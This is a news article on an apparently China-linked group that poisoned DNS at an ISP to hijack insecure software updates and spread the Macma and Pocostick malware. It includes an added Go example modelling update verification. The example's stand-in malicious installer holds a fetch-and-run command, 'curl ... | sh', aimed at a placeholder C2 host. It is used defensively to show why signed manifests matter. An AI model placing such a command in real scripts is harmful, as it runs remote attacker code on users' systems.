CyberSecurity SEE

China’s Sneaky Panda Strikes ISP with Malicious Software Updates

Researchers have found that a China-linked advanced persistent threat (APT) group compromised an Internet service provider (ISP) and used DNS poisoning to hijack software vendors' automatic update mechanisms. The attack delivered new variants of the Macma backdoor, along with post-exploitation malware used to exfiltrate sensitive data from compromised networks.

The attack, attributed to the group Evasive Panda, also tracked as StormBamboo and DaggerFly, was uncovered by researchers at Volexity after multiple systems were found infected with malware in mid-2023. According to Volexity's blog post, the researchers traced the infections to a highly active Chinese APT group that was manipulating DNS query responses for specific domains used by software vendors' automatic update channels.

Volexity researchers Ankur Saini, Paul Rascagneres, Steven Adair and Thomas Lancaster said StormBamboo targeted software whose update mechanisms were insecure, for example fetching updates over plain HTTP and not validating the digital signatures of installers. When those applications checked for updates, they unwittingly installed malware, including variants of Macma and Pocostick (also known as MgBot).

Macma, a macOS backdoor regularly used by Evasive Panda, was first documented by Google TAG in 2021; the variants Volexity analyzed share code with the GIMMICK macOS malware. Post-exploitation activity included deploying a malicious browser extension, Reloadext, which Volexity found exfiltrating victims' browser cookies to attacker-controlled cloud storage.

In one of the incidents investigated, Evasive Panda used DNS poisoning to deliver malware through an HTTP automatic update mechanism, and also poisoned the responses for legitimate hostnames that the malware then used as second-stage command-and-control (C2) servers. DNS poisoning here means tampering with DNS answers so that a hostname resolves to an address the attacker controls; in this case the tampering occurred within the compromised ISP's infrastructure rather than at the domains' authoritative servers, and any traffic the victim sent to the poisoned hostname could be intercepted or altered.

The researchers noted that the abuse of automatic updates followed the same pattern across the targeted applications: the legitimate application makes an HTTP request for a text file containing the latest version number and a link to the installer. By controlling DNS responses, the attackers redirected those requests to C2 servers hosting fake text files that pointed to malicious installers.

Evasive Panda's campaign targeted several software vendors with insecure update workflows, and the sophistication of the attacker's delivery chain varied with the application. For 5KPlayer, for example, the attacker used DNS poisoning to serve a modified configuration file that caused the application to download a backdoored upgrade package disguised as a legitimate update.
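The update flow described in the two paragraphs above, modelled as an added Go example (this is not code from the article, from Volexity, or from any vendor's updater): a client fetches a small text manifest, follows the installer link in it, and decides what to trust. Three trust levels are compared under a poisoned resolver. The key=value manifest layout, the hosts updates.example-vendor.test and c2.example.test, the Ed25519 keys derived from fixed seeds and the stand-in installer bodies are all constructed for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// Fetcher stands in for "HTTP GET" (URL -> body). DNS decides which server a
// request actually reaches, so a poisoned resolver is modelled as a second map
// in which the same vendor URLs return attacker-controlled bodies.
type Fetcher map[string][]byte

// Manifest is the text file the updater fetches. The key=value layout, field
// names and Ed25519 signature are assumptions of this example, not a vendor's format.
type Manifest struct {
	Version, URL, SHA256 string
	Sig                  []byte // Ed25519 over signedBody(); empty if the vendor does not sign
}

func (m Manifest) signedBody() string {
	return "version=" + m.Version + "\nurl=" + m.URL + "\nsha256=" + m.SHA256 + "\n"
}

func parseManifest(body []byte) (Manifest, error) {
	fields := map[string]string{}
	for _, line := range strings.Split(strings.TrimSpace(string(body)), "\n") {
		if key, val, ok := strings.Cut(line, "="); ok {
			fields[key] = val
		}
	}
	sig, err := hex.DecodeString(fields["sig"])
	if err != nil || fields["version"] == "" || fields["url"] == "" {
		return Manifest{}, errors.New("manifest missing or malformed fields")
	}
	return Manifest{Version: fields["version"], URL: fields["url"], SHA256: fields["sha256"], Sig: sig}, nil
}

// update runs one automatic-update check and returns the installer the client
// would go on to execute. checkHash=false, vendorPub=nil is the pattern the
// article describes; checkHash alone looks safer, but the attacker serves the
// manifest and picks the hash; only a pinned vendorPub actually stops them.
func update(f Fetcher, manifestURL string, checkHash bool, vendorPub ed25519.PublicKey) ([]byte, error) {
	body, ok := f[manifestURL]
	if !ok {
		return nil, errors.New("update server unreachable")
	}
	m, err := parseManifest(body)
	if err != nil {
		return nil, err
	}
	if vendorPub != nil && !ed25519.Verify(vendorPub, []byte(m.signedBody()), m.Sig) {
		return nil, errors.New("manifest signature invalid: refusing update")
	}
	installer, ok := f[m.URL]
	if !ok {
		return nil, errors.New("installer unreachable")
	}
	if checkHash && fmt.Sprintf("%x", sha256.Sum256(installer)) != m.SHA256 {
		return nil, errors.New("installer hash does not match manifest")
	}
	return installer, nil
}

// Constructed scenario: placeholder hosts, demo keys from fixed seeds, stand-in installers.
const manifestURL = "http://updates.example-vendor.test/latest.txt"

func pkgURL(ver string) string { return "http://updates.example-vendor.test/player-" + ver + ".pkg" }

// signedManifest builds and signs the text file a server publishes for ver/pkg.
func signedManifest(key ed25519.PrivateKey, ver string, pkg []byte) []byte {
	m := Manifest{Version: ver, URL: pkgURL(ver), SHA256: fmt.Sprintf("%x", sha256.Sum256(pkg))}
	sig := ed25519.Sign(key, []byte(m.signedBody()))
	return []byte(m.signedBody() + "sig=" + hex.EncodeToString(sig) + "\n")
}

var (
	vendorKey    = ed25519.NewKeyFromSeed([]byte(strings.Repeat("v", ed25519.SeedSize)))
	attackerKey  = ed25519.NewKeyFromSeed([]byte(strings.Repeat("a", ed25519.SeedSize)))
	vendorPub    = vendorKey.Public().(ed25519.PublicKey) // pinned inside the hardened client
	legitPkg     = []byte("#!/bin/sh\necho 'installing player 6.3'\n")
	maliciousPkg = []byte("#!/bin/sh\ncurl -s http://c2.example.test/stage2 | sh\n")
	// Honest DNS: the vendor's server answers both URLs.
	honestNet = Fetcher{manifestURL: signedManifest(vendorKey, "6.3", legitPkg), pkgURL("6.3"): legitPkg}
	// Poisoned DNS: both URLs land on the attacker's server, which writes the
	// hash of its own package into the manifest and signs with its own key.
	poisonedNet = Fetcher{manifestURL: signedManifest(attackerKey, "6.4", maliciousPkg), pkgURL("6.4"): maliciousPkg}
)

func main() {
	_, insecure := update(poisonedNet, manifestURL, false, nil)
	_, hashOnly := update(poisonedNet, manifestURL, true, nil)
	_, signed := update(poisonedNet, manifestURL, true, vendorPub)
	fmt.Printf("under poisoned DNS -> insecure: %v | hash-only: %v | signed: %v\n", insecure, hashOnly, signed)
}
```

The point the middle case makes is that a hash published in the same unauthenticated manifest buys nothing against an attacker who controls name resolution: they serve the manifest too. What breaks the attack is a verification key the client already holds before it talks to the network, whether a vendor signing key pinned in the binary as here or, at minimum, TLS with proper certificate validation so that a poisoned answer leads to a server that cannot present a valid certificate for the update hostname.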

Volexity worked with the compromised ISP, which investigated and remediated the malicious activity; once key devices on its network were taken offline, the DNS poisoning stopped. Volexity emphasized the sophistication of Evasive Panda's operations and the group's habit of compromising third parties to reach its actual targets. The group has previously been linked to hijacking software update channels to distribute malware, showing a high level of skill and aggressiveness in its cyber-espionage operations.

The researchers published detection rules and indicators of compromise (IOCs) in their report to help organizations determine whether they were affected. The incident is a reminder that advanced threat actors continue to exploit weaknesses in software update mechanisms: an update channel that uses plain HTTP and does not verify installer signatures is only as trustworthy as the network path between the client and the vendor.
